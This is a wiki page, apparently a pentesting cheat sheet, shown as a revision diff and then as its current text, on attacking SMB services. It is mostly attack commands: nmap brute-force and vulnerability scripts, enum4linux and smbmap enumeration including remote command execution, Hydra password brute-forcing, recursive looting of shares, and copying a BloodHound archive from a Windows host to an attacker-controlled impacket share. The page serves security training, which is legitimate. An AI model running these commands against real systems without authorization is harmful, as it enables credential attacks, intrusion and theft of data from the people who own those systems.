SMB: Difference between revisions

From RCATs
No edit summary
No edit summary
Line 1: Line 1:


SMB Pentesting
==Description ==
 
 
SMB stands for Server Message Block. Default ports are 445, 139.
SMB stands for Server Message Block. Default ports are 445, 139.


Line 8: Line 6:
It allows clients, like workstations, to communicate with a server like a share directory.
It allows clients, like workstations, to communicate with a server like a share directory.


SMB Enumeration
==Enumeration==
=== Nmap ===
Automatic enumeration can be done with [[Nmap]] like so. Pay attention here the port may be different but no all the time and of course the ip will be different.


Auto enum can be done with nmap like so. Pay attention here the port may be different but no all the time and of course the ip will be different.
<syntaxhighlight lang="bash">


nmap --script smb-brute -p 445 <target-ip>
nmap --script smb-brute -p 445 <target-ip>
Line 21: Line 21:


nmap --script smb-vuln* -p 445 <target-ip>
nmap --script smb-vuln* -p 445 <target-ip>
Enum4Linux enumerates the users, share directories, etc.


</syntaxhighlight>
=== Enum4Linux ===
[[Enum4Linux]] enumerates the users, share directories, etc.
<syntaxhighlight lang="bash">
enum4linux <target-ip>    #  Basic use.
enum4linux <target-ip>    #  Basic use.


Line 29: Line 33:
enum4linux -v <target-ip> # Verbose.
enum4linux -v <target-ip> # Verbose.


enum4linux -u username -p password <target-ip> #Specify username and password this can get us even more information as we will have accessed that users share.
#Specify username and password this can get us even more information as we will have accessed that users share.
 
enum4linux -u username -p password <target-ip>
Smbmap
</syntaxhighlight>
=== SMB Map ===
<syntaxhighlight lang="bash">
smbmap -H <target-ip>


smbmap -H <target-ip>
smbmap -H <target-ip> -R # Recursive lookup.
smbmap -H <target-ip> -R # Recursive lookup.


smbmap -u username -p password -H <target-ip> # Username and Password
# Username and Password
smbmap -u username -p password -H <target-ip>


smbmap -u username -p password -H <target-ip> -x 'ipconfig' # Execute a command
# Execute a command
 
smbmap -u username -p password -H <target-ip> -x 'ipconfig'
Brute Force Credentials
</syntaxhighlight>
hydra -l username -P passwords.txt <target-ip> smb
=== SMBClient ===
hydra -L usernames.txt -p password <target-ip> smb


Connect with smbclient
Connect with smbclient
 
<syntaxhighlight lang="bash">
smbclient -L 10.0.0.1
smbclient -L 10.0.0.1


Line 53: Line 59:


smbclient -L 10.0.0.1 -U username
smbclient -L 10.0.0.1 -U username
Anonymous


smbclient //10.0.0.1/somedir -N
smbclient //10.0.0.1/somedir -N


smbclient "//10.0.0.1/some dir" -N                      # use of ""
# use of ""
smbclient "//10.0.0.1/some dir" -N                       


smbclient //10.0.0.1/somedir -U username        # Specify shared directory
# Specify shared directory
smbclient //10.0.0.1/somedir -U username         


smbclient -L 10.0.0.1 -W WORKGROUP -U username            # Specify workgroup
# Specify workgroup
smbclient -L 10.0.0.1 -W WORKGROUP -U username             
</syntaxhighlight>


== Brute Force ==
=== Brute Force Credentials ===
[[Hydra]]
<syntaxhighlight lang="bash">
hydra -l username -P passwords.txt <target-ip> smb


hydra -L usernames.txt -p password <target-ip> smb
</syntaxhighlight>


 
== Basic Commands ==
 
                                                                  '''Commands in SMB'''
 
Once Connected we can find sensitive files or information and we love that as hackers dont we.
Once Connected we can find sensitive files or information and we love that as hackers dont we.
 
<syntaxhighlight lang="bash">
List Files
#List Files
 
smb> ls
smb> ls


Download a file
# Download a file
 
smb> get sample.txt
smb> get sample.txt


Put a file can be txt,pdf,php etc..
# Put a file can be txt,pdf,php etc..
 
smb> put sample.txt
smb> put sample.txt


Download files recursively below
# Download files recursively below
 
smb> mask ""
smb> mask ""
smb> recurse ON
smb> recurse ON
smb> prompt OFF
smb> prompt OFF
smb> mget *
smb> mget *


smbget -R smb://<target-ip>/somedir -U username        # We can use smbget from our local machine as well
# We can use smbget from our local machine as well
 
smbget -R smb://<target-ip>/somedir -U username         
          Specify workgroup


# Specify work group
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username


        as anonymous user
# As anonymous user
 
smbget smb://<target-ip>/somedir -U anonymous  password: anonymous
smbget smb://<target-ip>/somedir -U anonymous  password: anonymous


Transfer a file from windows to my attacker machine
# Transfer a file from windows to my attacker machine
 
# In your local kali make a directory that you want that file to go into.
In your local kali make a directory that you want that file to go into.
mk dir smb
 
mk dir smb
 
Next we will run impacket-smbserver
 
sudo impacket-smbserver -smb2support share $(pwd)


Then we will transfer the file over to that share we just set up with impacket-smbserver.
# Next we will run impacket-smbserver
sudo impacket-smbserver -smb2support share $(pwd)


#Then we will transfer the file over to that share we just set up with impacket-smbserver.
powershell copy bloodhound.zip \\attackip\share\
powershell copy bloodhound.zip \\attackip\share\


I choose to show you a transfer of a bloodhound zip file which is super important when enumerating AD.
# I choose to show you a transfer of a bloodhound zip file which is super important when enumerating AD.
</syntaxhighlight>

Revision as of 16:19, 21 January 2023

Description

SMB stands for Server Message Block. Default ports are 445, 139.

Ok what does it do? Glad you asked. It allows clients, like workstations, to communicate with a server like a share directory.

Enumeration

Nmap

Automatic enumeration can be done with Nmap like so. Pay attention here the port may be different but no all the time and of course the ip will be different.

nmap --script smb-brute -p 445 <target-ip>

nmap --script smb-enum-shares.nse,smb-enum-users.nse -p 445 <target-ip>

nmap --script smb-enum* -p 445 <target-ip>

nmap --script smb-protocols -p 445 <target-ip>

nmap --script smb-vuln* -p 445 <target-ip>

Enum4Linux

Enum4Linux enumerates the users, share directories, etc.

enum4linux <target-ip>    #  Basic use.

enum4linux -a <target-ip>	# All Enum.

enum4linux -v <target-ip>	# Verbose.

#Specify username and password this can get us even more information as we will have accessed that users share.
enum4linux -u username -p password <target-ip>

SMB Map

smbmap -H <target-ip>

smbmap -H <target-ip> -R	# Recursive lookup.

# Username and Password 
smbmap -u username -p password -H <target-ip>	

# Execute a command
smbmap -u username -p password -H <target-ip> -x 'ipconfig'

SMBClient

Connect with smbclient

smbclient -L 10.0.0.1

smbclient -N -L 10.0.0.1

smbclient -N -L \\\\10.0.0.1

smbclient -L 10.0.0.1 -U username

smbclient //10.0.0.1/somedir -N

# use of "" 
smbclient "//10.0.0.1/some dir" -N                       

# Specify shared directory
smbclient //10.0.0.1/somedir -U username        

# Specify workgroup
smbclient -L 10.0.0.1 -W WORKGROUP -U username

Brute Force

Brute Force Credentials

Hydra

hydra -l username -P passwords.txt <target-ip> smb

hydra -L usernames.txt -p password <target-ip> smb

Basic Commands

Once Connected we can find sensitive files or information and we love that as hackers dont we.

#List Files
smb> ls

# Download a file
smb> get sample.txt

# Put a file can be txt,pdf,php etc..
smb> put sample.txt

# Download files recursively below
smb> mask ""
smb> recurse ON
smb> prompt OFF
smb> mget *

# We can use smbget from our local machine as well
smbget -R smb://<target-ip>/somedir -U username        

# Specify work group
smbget -R smb://<target-ip>/somedir -w WORKGROUP -U username

# As anonymous user
smbget smb://<target-ip>/somedir -U anonymous  password: anonymous

# Transfer a file from windows to my attacker machine
# In your local kali make a directory that you want that file to go into.
mk dir smb

# Next we will run impacket-smbserver
sudo impacket-smbserver -smb2support share $(pwd)

#Then we will transfer the file over to that share we just set up with impacket-smbserver.
powershell copy bloodhound.zip \\attackip\share\

# I choose to show you a transfer of a bloodhound zip file which is super important when enumerating AD.